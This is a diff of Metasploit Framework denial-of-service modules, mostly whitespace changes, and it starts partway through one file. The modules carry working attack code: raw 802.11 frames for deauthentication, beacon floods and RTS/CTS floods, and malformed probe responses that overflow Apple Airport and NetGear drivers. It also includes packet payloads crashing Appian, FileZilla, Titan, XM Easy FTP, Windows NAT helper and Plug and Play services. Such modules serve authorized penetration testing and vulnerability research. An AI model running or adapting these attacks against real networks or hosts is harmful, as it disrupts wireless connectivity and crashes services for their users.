when 'CTS'
|
||||
|
||||
frame =create_cts()
|
||||
else
|
||||
else
|
||||
print_status("No TYPE selected!!")
|
||||
return
|
||||
return
|
||||
end
|
||||
|
||||
open_wifi
|
||||
|
||||
open_wifi
|
||||
print_status("Sending #{datastore['NUM']} #{datastore['TYPE'].upcase} frames.....")
|
||||
|
||||
datastore['NUM'].to_i.times do
|
||||
wifi.write(frame)
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
def create_rts
|
||||
|
||||
|
||||
frame =
|
||||
"\xb4" + # Type/SubType
|
||||
"\x00" + # Flags
|
||||
@ -62,8 +73,8 @@ class Metasploit3 < Msf::Auxiliary
|
||||
return frame
|
||||
end
|
||||
def create_cts
|
||||
|
||||
frame =
|
||||
|
||||
frame =
|
||||
"\xc4" + # Type/SubType
|
||||
"\x00" + # Flags
|
||||
"\xff\x7f" + # Duration
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,21 +19,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Apple Airport 802.11 Probe Response Kernel Memory Corruption',
|
||||
'Description' => %q{
|
||||
The Apple Airport driver provided with Orinoco-based Airport cards (1999-2003 PowerBooks, iMacs)
|
||||
is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning
|
||||
is vulnerable to a remote memory corruption flaw. When the driver is placed into active scanning
|
||||
mode, a malformed probe response frame can be used to corrupt internal kernel structures, leading
|
||||
to arbitrary code execution. This vulnerability is triggered when a probe response frame is received
|
||||
that does not contain valid information element (IE) fields after the fixed-length header. The data
|
||||
following the fixed-length header is copied over internal kernel structures, resulting in memory
|
||||
that does not contain valid information element (IE) fields after the fixed-length header. The data
|
||||
following the fixed-length header is copied over internal kernel structures, resulting in memory
|
||||
operations being performed on attacker-controlled pointer values.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-5710'],
|
||||
['OSVDB', '30180'],
|
||||
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[
|
||||
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
#
|
||||
@ -54,38 +54,38 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
def run
|
||||
open_wifi
|
||||
|
||||
|
||||
cnt = datastore['COUNT'].to_i
|
||||
|
||||
print_status("Creating malicious probe response frame...")
|
||||
print_status("Creating malicious probe response frame...")
|
||||
frame = create_frame()
|
||||
|
||||
|
||||
print_status("Sending #{cnt} frames...")
|
||||
cnt.times { wifi.write(frame) }
|
||||
end
|
||||
|
||||
|
||||
def create_frame
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
seq = [rand(255)].pack('n')
|
||||
caps = [rand(65535)].pack('n')
|
||||
|
||||
frame =
|
||||
|
||||
frame =
|
||||
"\x50" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
Rex::Text.rand_text(2) + # beacon interval
|
||||
Rex::Text.rand_text(2) # capabilities
|
||||
|
||||
|
||||
frame << [0x0defaced].pack('N') * ((1024-frame.length) / 4)
|
||||
|
||||
|
||||
return frame
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
|
@ -1,10 +1,21 @@
|
||||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info ={})
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireless DEAUTH Flooder',
|
||||
@ -12,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
This module sends 802.11 DEAUTH requests to a specific wireless peer,
|
||||
using the specified source address and source BSSID.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'Brad Antoniewicz' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
@ -27,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
|
||||
print_status("Creating Deauth frame with the following attributes:")
|
||||
print_status("\tDST: #{datastore['ADDR_DST']}")
|
||||
print_status("\tSRC: #{datastore['ADDR_SRC']}")
|
||||
@ -41,11 +52,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||
wifi.write(create_deauth())
|
||||
end
|
||||
close_wifi
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def create_deauth
|
||||
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
seq = [rand(255)].pack('n')
|
||||
frame =
|
||||
"\xc0" + # Type/SubType
|
||||
"\x00" + # Flags
|
||||
@ -53,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
eton(datastore['ADDR_DST']) + # dst addr
|
||||
eton(datastore['ADDR_SRC']) + # src addr
|
||||
eton(datastore['ADDR_BSS']) + # BSSID
|
||||
seq + # sequence number
|
||||
seq + # sequence number
|
||||
"\x07\x00" # Reason Code (nonassoc. sta)
|
||||
return frame
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -20,18 +20,18 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireless Fake Access Point Beacon Flood',
|
||||
'Description' => %q{
|
||||
This module can advertise thousands of fake access
|
||||
points, using random SSIDs and BSSID addresses. Inspired
|
||||
by Black Alchemy's fakeap tool.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm', 'kris katterjohn' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptInt.new('NUM', [false, "Number of beacons to send"]),
|
||||
@ -59,39 +59,39 @@ class Metasploit3 < Msf::Auxiliary
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
end
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
|
||||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x00\x05" + # capability flags
|
||||
|
||||
|
||||
# ssid tag
|
||||
"\x00" + ssid.length.chr + ssid +
|
||||
|
||||
|
||||
# supported rates
|
||||
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
|
||||
|
||||
|
||||
# current channel
|
||||
"\x03" + "\x01" + datastore['CHANNEL'].to_i.chr +
|
||||
|
||||
"\x03" + "\x01" + datastore['CHANNEL'].to_i.chr +
|
||||
|
||||
# traffic indication map
|
||||
"\x05" + "\x04" + "\x00\x01\x02\x20" +
|
||||
|
||||
|
||||
# country information
|
||||
"\x07" + "\x06" + "\x55\x53\x20\x01\x0b\x12" +
|
||||
|
||||
|
||||
# erp information
|
||||
"\x2a" + "\x01" + "\x00" +
|
||||
|
||||
|
||||
# extended supported rates
|
||||
"\x32" + "\x04" + "\x12\x24\x60\x6c"
|
||||
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,25 +17,25 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'NetGear MA521 Wireless Driver Long Rates Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the NetGear MA521 wireless device
|
||||
driver under Windows XP. When a specific malformed frame (beacon or probe response)
|
||||
is received by the wireless interface under active scanning mode, the MA521nd5.SYS
|
||||
is received by the wireless interface under active scanning mode, the MA521nd5.SYS
|
||||
driver attempts to write to an attacker-controlled memory location. The vulnerability
|
||||
is triggered by an invalid supported rates information element.
|
||||
|
||||
This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
|
||||
|
||||
This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
|
||||
NetGear MA521 Cardbus adapter. A remote code execution module is also in development.
|
||||
|
||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
(external/ruby-lorcon/README) for more information.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
@ -44,13 +44,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||
['OSVDB', '30507'],
|
||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'],
|
||||
['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip']
|
||||
]
|
||||
]
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF'])
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
@ -80,15 +80,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
ssid = Rex::Text.rand_text(6)
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
frame =
|
||||
|
||||
frame =
|
||||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x01\x00" + # capabilities
|
||||
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# channel IE
|
||||
"\x03" + "\x01" + channel.chr
|
||||
|
||||
|
||||
return frame
|
||||
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,39 +17,39 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'NetGear WG311v1 Wireless Driver Long SSID Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in the NetGear WG311v1 wireless device
|
||||
driver under Windows XP and 2000. A kernel-mode heap overflow occurs
|
||||
when malformed probe response frame is received that contains a long SSID field
|
||||
|
||||
This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a
|
||||
|
||||
This DoS was tested with version 2.3.1.10 of the WG311ND5.SYS driver and a
|
||||
NetGear WG311v1 PCI card. A remote code execution module is also in development.
|
||||
|
||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
(external/ruby-lorcon/README) for more information.
|
||||
|
||||
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-6125'],
|
||||
['OSVDB', '30511'],
|
||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
|
||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-22-11-2006.html'],
|
||||
['URL', 'ftp://downloads.netgear.com/files/wg311_1_3.zip'],
|
||||
]
|
||||
]
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
@ -78,15 +78,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
def create_probe_response
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
frame =
|
||||
|
||||
frame =
|
||||
"\x50" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x01\x00" + # capabilities
|
||||
@ -99,10 +99,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# channel IE
|
||||
"\x03" + "\x01" + channel.chr
|
||||
|
||||
|
||||
return frame
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
=begin
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,40 +19,40 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Multiple Wireless Vendor NULL SSID Probe Response',
|
||||
'Description' => %q{
|
||||
This module exploits a firmware-level vulnerability in a variety of
|
||||
This module exploits a firmware-level vulnerability in a variety of
|
||||
802.11b devices. This attack works by sending a probe response frame
|
||||
containing a NULL SSID information element to an affected device. This
|
||||
flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere,
|
||||
flaw affects many cards based on the Choice MAC (Intersil, Lucent, Agere,
|
||||
Orinoco, and the first generation of Airport cards).
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://802.11ninja.net/papers/firmware_attack.pdf'],
|
||||
['WVE', '2006-0064']
|
||||
['WVE', '2006-0064']
|
||||
]
|
||||
))
|
||||
register_options(
|
||||
[
|
||||
OptInt.new('COUNT', [ true, "The number of frames to send", 2000]),
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system"])
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
open_wifi
|
||||
|
||||
|
||||
cnt = datastore['COUNT'].to_i
|
||||
|
||||
print_status("Creating malicious probe response frame...")
|
||||
print_status("Creating malicious probe response frame...")
|
||||
frame = create_frame()
|
||||
|
||||
|
||||
print_status("Sending #{cnt} frames...")
|
||||
cnt.times { wifi.write(frame) }
|
||||
end
|
||||
@ -61,21 +61,21 @@ class Metasploit3 < Msf::Auxiliary
|
||||
bssid = Rex::Text.rand_text(6)
|
||||
seq = [rand(255)].pack('n')
|
||||
caps = [rand(65535)].pack('n')
|
||||
|
||||
frame =
|
||||
|
||||
frame =
|
||||
"\x50" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
bssid + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
Rex::Text.rand_text(2) + # beacon interval
|
||||
Rex::Text.rand_text(2) + # capabilities
|
||||
[0, 0].pack('CC') # Type=SSID(0) Length=0
|
||||
|
||||
|
||||
return frame
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -19,17 +19,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Wireless Test Module',
|
||||
'Description' => %q{
|
||||
This module is a test of the wireless packet injection system.
|
||||
Please see external/ruby-lorcon/README for more information.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
))
|
||||
end
|
||||
|
||||
def run
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,15 +17,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Appian Enterprise Business Suite 5.6 SP1 DoS',
|
||||
'Description' => %q{
|
||||
This module exploits a denial of service flaw in the Appian
|
||||
Enterprise Business Suite service.
|
||||
Enterprise Business Suite service.
|
||||
},
|
||||
|
||||
|
||||
'Author' => [ 'guiness.stout <guinness.stout@gmail.com>' ],
|
||||
'License' => BSD_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
@ -37,17 +37,17 @@ class Metasploit3 < Msf::Auxiliary
|
||||
],
|
||||
'DisclosureDate' => 'Dec 17 2007'
|
||||
))
|
||||
|
||||
|
||||
register_options([Opt::RPORT(5400),], self.class)
|
||||
end
|
||||
|
||||
def run
|
||||
print_status('Connecting to the service...')
|
||||
connect
|
||||
|
||||
|
||||
# mod: randomize the static "saint" strings from the PoC - hdm
|
||||
|
||||
req =
|
||||
|
||||
req =
|
||||
"\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
|
||||
"\x00\x00\x00\x00\x00\x00\x00" +
|
||||
@ -93,10 +93,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||
"\x00\x00\x00\x03\x00\x00\x00\x00\xe2\x16\x00\x01\x09\x06\x08\x33"+
|
||||
"\x6d\x7f\xff\xff\xff\xfe\x02\x09\x00\x00\x00\x00\x0a\x68\x00\x00"+
|
||||
"\x00"
|
||||
|
||||
|
||||
print_status('Sending exploit...')
|
||||
sock.put(req)
|
||||
|
||||
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'FileZilla FTP Server Admin Interface Denial of Service',
|
||||
'Description' => %q{
|
||||
This module triggers a Denial of Service condition in the FileZilla FTP
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'FileZilla FTP Server <=0.9.21 Malformed PORT Denial of Service',
|
||||
'Description' => %q{
|
||||
This module triggers a Denial of Service condition in the FileZilla FTP
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Ftp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Titan FTP Server 6.26.630 SITE WHO DoS',
|
||||
'Description' => %q{
|
||||
The Titan FTP server v6.26 build 630 can be DoS'd by
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Ftp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'XM Easy Personal FTP Server 5.6.0 NLST DoS',
|
||||
'Description' => %q{
|
||||
This module is a port of shinnai's script. You need
|
||||
|
@ -3,10 +3,10 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Ftp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'XM Easy Personal FTP Server 5.7.0 NLST DoS',
|
||||
'Description' => %q{
|
||||
You need a valid login to DoS this FTP server, but
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -17,14 +17,14 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Windows NAT Helper Denial of Service',
|
||||
'Description' => %q{
|
||||
This module exploits a denial of service vulnerability
|
||||
within the Internet Connection Sharing service in
|
||||
Windows XP.
|
||||
within the Internet Connection Sharing service in
|
||||
Windows XP.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'CVE', '2006-5614' ],
|
||||
],
|
||||
'DisclosureDate' => 'Oct 26 2006'))
|
||||
|
||||
|
||||
register_options([Opt::RPORT(53),], self.class)
|
||||
end
|
||||
|
||||
@ -46,14 +46,15 @@ class Metasploit3 < Msf::Auxiliary
|
||||
pkt = "\x6c\xb6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
pkt << "\x03" + Rex::Text.rand_text_english(3) + "\x06"
|
||||
pkt << Rex::Text.rand_text_english(10) + "\x03"
|
||||
pkt << Rex::Text.rand_text_english(3)
|
||||
pkt << Rex::Text.rand_text_english(3)
|
||||
pkt << "\x00\x00\x01\x00\x01"
|
||||
|
||||
|
||||
print_status("Sending dos packet...")
|
||||
|
||||
|
||||
udp_sock.put(pkt)
|
||||
|
||||
|
||||
disconnect_udp
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
@ -3,7 +3,7 @@
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
@ -15,22 +15,22 @@ require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
|
||||
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
include Msf::Exploit::Remote::SMB
|
||||
include Msf::Auxiliary::Dos
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'Microsoft Plug and Play Service Registry Overflow',
|
||||
'Description' => %q{
|
||||
This module triggers a stack overflow in the Windows Plug
|
||||
and Play service. This vulnerability can be exploited on
|
||||
Windows 2000 without a valid user account. Since the PnP
|
||||
service runs inside the service.exe process, this module
|
||||
will result in a forced reboot on Windows 2000. Obtaining
|
||||
will result in a forced reboot on Windows 2000. Obtaining
|
||||
code execution is possible if user-controlled memory can
|
||||
be placed at 0x00000030, 0x0030005C, or 0x005C005C.
|
||||
be placed at 0x00000030, 0x0030005C, or 0x005C005C.
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
@ -43,12 +43,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
[ 'OSVDB', '18830' ]
|
||||
]
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('SMBPIPE', [ true, "The pipe name to use (browser, srvsvc, wkssvc, ntsvcs)", 'browser']),
|
||||
], self.class)
|
||||
|
||||
|
||||
end
|
||||
|
||||
=begin
|
||||
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
# Determine which pipe to use
|
||||
pipe = datastore['SMBPIPE']
|
||||
|
||||
|
||||
print_status("Connecting to the SMB service...")
|
||||
connect()
|
||||
smb_login()
|
||||
@ -91,12 +91,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||
path = "HTREE\\ROOT" + ("\\" * i)
